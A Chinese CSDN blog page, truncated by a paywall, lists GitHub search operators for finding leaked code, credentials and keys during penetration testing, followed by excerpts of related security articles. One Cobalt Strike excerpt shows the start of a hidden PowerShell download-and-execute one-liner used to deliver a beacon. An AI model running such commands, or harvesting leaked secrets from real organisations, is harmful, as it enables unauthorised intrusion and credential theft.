Github信息收集骚姿势

最新推荐文章于 2024-11-07 16:25:08 发布
最新推荐文章于 2024-11-07 16:25:08 发布
阅读量5.4k 收藏 26
点赞数 8
CC 4.0 BY-SA版权
分类专栏: 渗透杂项 文章标签: github 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47418965/article/details/121556647

目录

一、github搜索之基础语法

二、配合google语法使用

三、工具推荐

         渗透中github敏感信息泄露的收集是个重要点,经常能发现员工上传的公司代码、用户名密码、个人信息和客户key等敏感信息。那GitHub有没有类似GoogleHack一系列的命令语法呢?如何使用高级命令语法进行信息收集让你我有意想不到的收获呢?

一、github搜索之基础语法

in:name test               # 仓库标题搜索含有关键字test
language:java test         # 在java语言的代码中搜索关键字
in:descripton test         # 仓库描述搜索含有关键字
in:readme test             # Readme文件搜素含有关键字
stars:>3000 test           # stars数量大于3000的搜索关键字
stars:1000..3000 test      # stars数量大于1000小于3000的搜索关键字
forks:>1000 test           # forks数量大于1000的搜索关键字
forks:1000..3000 te
最低0.47元/天 解锁文章

200万优质内容无限畅学
[AI in security]-216 开源威胁情报线索【仅供学习研究使用】
AI拉呱,专注于人工智与网络安全方面的研究,关注一起学习。
08-08 1884
暗网大屏:https://gcokedsa123.grafana.net/dashboard/snapshot/2OJ9OtmtitwiGcIqwIVhvzgmTKDBtTkF?9.深信服安全中心 https://wiki.sec.sangfor.com.cn/index/abroad。微步测绘:https://x.threatbook.com/v5/mapping。火花:https://ti.venuseye.com.cn/#/home。
【十 自然语言处理项目实战】【10.1 项目选题与需求分析】
最新发布
商务合作|问题讨论|交流学习 请联系作者微信,加微信请务必注明来意,博客主页有联系方式
03-12 97
各位在NLP领域跃跃欲试的少侠们,今天咱们要聊的这个话题,就像你去吃火锅时的锅底选择——选对了选题是牛油锅底香得流口水,选错了就是清汤锅底淡出鸟来!作为一个经历过选题车祸现场的老司机(曾经做过"用LSTM预测双色球"这种作死项目),这就把八年踩坑经验熬成一锅干货浓汤!(搬好小板凳)
手把手edusrc漏洞挖掘和github信息收集
2401_83799022的博客
07-03 847
对于新人刚开设挖edusrc的时候需要花大量的时间来找系统和信息收集,当你遇见的系统又waf的时候可以适当的放弃别再这上面花时间了,列入sql注入,一个单引号尝试报错和闭合(最多就是把简单的绕过尝试一下)如果不行,那就果断放弃。显而易见的是查询功能,那么第一反应是sql注入,如果有waf,可以轻微尝试绕过,因为edu中的系统相对于企业中就脆弱多了,当然sql注入理解的越深入,那么你挖sql注入的概率越大,任然常规操作,可以看看逻辑漏洞是否可以直接爆出密码这些。
GitHub信息收集
quixon的专栏
09-30 1362
目录桌面版脑图(DesktopNaotu) 桌面版脑图(DesktopNaotu) GitHub链接 桌面版脑图 (百度脑图离线版,思维导图) 跨平台支持 Windows/Linux/Mac OS. (A cross-platform multilingual Mind Map Tool) 操作系统 位数 对应文件 大小 支持情况 MacOS 64位 DesktopNaotu-ma...
Cobaltstrike4.0系列 -- Beacon HTTP
Web安全工具库
06-23 961
讲过去像是在卖惨,讲未来像是在白日做梦,讲现在又像是旁观者迷,迟迟无语,字字苦酸。。。 ---- 网易云热评 一、新建Listeners,点击save 二、利用powershell命令获取目标主机的Beacon 1、选择Attacks--WebDrive-by--ScriptedwebDelivery 2、选择添加的Listener,点击Launch 3、获取powershell的单行指令 powershell.exe -nop -w hidden -c "IEX ((ne...
github搜索语法-信息搜集指南----总结
kuokay的博客
06-06 3343
您可以使用文件查找器在仓库中搜索文件。 要在 GitHub 上的多个仓库中搜索文件,请使用 filename 代码搜索限定符。提示:1.在 GitHub.com 上,导航到仓库的主页面。 2.在文件列表上方,单击 Go to file(转到文件)。 3.在搜索字段中,键入要查找文件的名称。 4.在结果列表中 ,单击要查找的文件。您可以在 GitHub搜索仓库,并使用这些仓库搜索限定符的任意组合缩小结果范围。您可以在所有 GitHub.com 内全局搜索仓库,也可以在特定组织内搜索仓库。要在搜索结果中
github上的信息收集
Zlirving_的博客
06-19 1817
在一个交流群上,看到有位老哥在github上找某SRC厂商的信息泄露,俗称“捡垃圾”,报上高危,换算过来赏了xxxx软妹币。有点心动? 所以今天也学习除了google hack以外的关于github上敏感信息的一些搜索语法(主要也是结合google) Github是一个分布式的版本控制系统,目前拥有上百万万开发者用户。当今大规模数据泄露事情一直在发生,从未停止过,但有些人不知道的是很多时候一些敏感信息的泄露其实是我们自己无意中造成的,然而一个小疏忽,往往却造成一系列连锁反应…… Github上敏感信息的泄露
你真的会用GitHub吗?如果你连这几种使用方式都不知道,还敢说会用?(GitHub正确打开方式及使用技巧)
石榴姐yyds
03-31 1853
众所周知GitHub是一个强大的知识宝库,里面既有项目代码又有知识文章,对于程序员来说是一笔不可多得的财富。但是在如此项目代码庞大、项目数居多,文章专题居多的情况下,如何快速搜索自己想要的项目代码及文章呢?本篇文章将给你详细讲述GitHub中的使用技巧,并让你能准确的搜索到自己想要的东西,开启你正确使用GitHub的使用姿势
小白必读记~内网渗透信息搜集 (超级详细的哦)(1)
weixin_45900492的博客
11-26 1065
渗透的“灵魂”——信息搜集 大家好: 欢迎阅读此文章 ,个人感觉做渗透犹如去做一件任务或者攻打一个事物。我们首先掌握被攻击者的习惯,属性,知己知彼方能百战百胜。渗透也一样,我们首先对这个网站进行了解,所以我认为信息搜集是他的“灵魂’. 特别是小白们,多多第几遍哦! 我ye是过来人@ 只要你信息搜集比较多,对他了解比较多,挖漏洞也是很容易的。 话不多说,正文开始!请耐心细品!!! 1.1 第一步...
信息收集Github搜索语法
大河之犬的博客
03-01 967
在测试的信息收集阶段,可以去Github和码云上搜索与目标有关的信息,或者就有意想不到的收获。(有些开发人员将代码上传到代码库的时候,有可能连一些重要的配置信息甚至密码也上传了)
gitrob--github信息收集
iteye_16188的博客
01-17 593
原文地址:[url]http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/[/url] 简介 [quote] Gitrob is a command line tool that can help organizations and security professionals find such sen...
Src挖掘之手把手edusrc漏洞挖掘和github信息收集
W718645383的博客
07-07 1717
这里主要还是介绍下新手入门edusrc漏洞挖掘以及在漏洞挖掘的过程中信息收集的部分哈!(主要给小白看的,大佬就当看个热闹了)下面的话我将以好几个不同的方式来给大家介绍下edusrc入门的漏洞挖掘手法以及利用github信息收集的过程以及给师傅们分享一些比较好用的工具哈。在漏洞挖掘的过程前期我们进行信息收集github和码云搜索相关的信息,代码库,运气好的话可以在库中发现一些重要配置如数据库用户密码等。这里先给师傅们分享一下。
推荐两款github敏感信息搜集工具(gsil、gshark)
技术超强的网络安全平台
08-02 2136
所以我们能在第一时间发现自己企业泄露了哪些信息或者获取别人énénén······是很有必要的,这时你就需要下面两个神器啦。# 一级分类,一般使用公司名,用作开启扫描的第一个参数(python gsil.py test)介绍:此工具主要用于GitHub敏感信息泄露的监控,可实现邮件实时告警,缺点不是可视化。直接点击上面的链接会跳到那个文件,这时你就可以愉快的寻找敏感信息啦,哦耶。不建议使用window部署,别问为什么,问就是“错错错,是我的错”一栏,点击开启,绑定QQ安全中心的用户需要输入app中的令牌。
【小迪安全2023】个人学习笔记——信息收集(WAF扫描,github推送监控,封包监听工具,端口扫描)
发布一些个人学习笔记,分享一些可能在安全学习道路上遇到的问题、心得,一起学习一起进步
04-25 2854
主要是信息收集阶段的一些思路,推荐了一些常用的信息收集网站或者项目的地址,主要涉及了网站依照搭建习惯的分类,网站端口扫描,WAF防护分析,teemo子域名枚举脚本,网站证书查询等信息收集阶段方面的内容
github信息收集规则
weixin_51884452的博客
11-07 461
github信息收集规则
信息收集Github漏洞与泄露
K
10-11 429
现在我们已经建立了我们范围的资产清单,是时候寻找一些容易获得的 OSINT 成果了。
渗透测试-信息收集之Google hacking + GitHub
G3et的博客
03-11 809
Google hacking 是一种通过使用 Google 搜索引擎中的高级运算符来查找存储在网站上的敏感信息的技术。这可能包括登录凭据、敏感文件和其他敏感数据等信息GitHub 信息收集是通过分析目标在 GitHub 平台上的活动来收集信息的过程。这可能包括他们的代码库、开源贡献和任何其他公开可用的信息等。这两种技术都被认为是 OSINT(开源情报)的一种形式,经常被安全研究人员和渗透测试人员在尝试攻击之前收集目标信息使用。
手把手教学 edu src 漏洞挖掘(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
07-10 7630
显而易见的是查询功能,那么第一反应是sql注入,如果有waf,可以轻微尝试绕过,因为edu中的系统相对于企业中就脆弱多了,当然sql注入理解的越深入,那么你挖sql注入的概率越大,任然常规操作,可以看看逻辑漏洞是否可以直接爆出密码这些。可以看到我这里使用bp进行接口爆破,然后配上bp的插件HAE,可以检测到一些存在未授权访问,敏感信息泄露的信息,常见的比如身份证号、手机号、姓名、家庭地址、毕业信息什么的。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值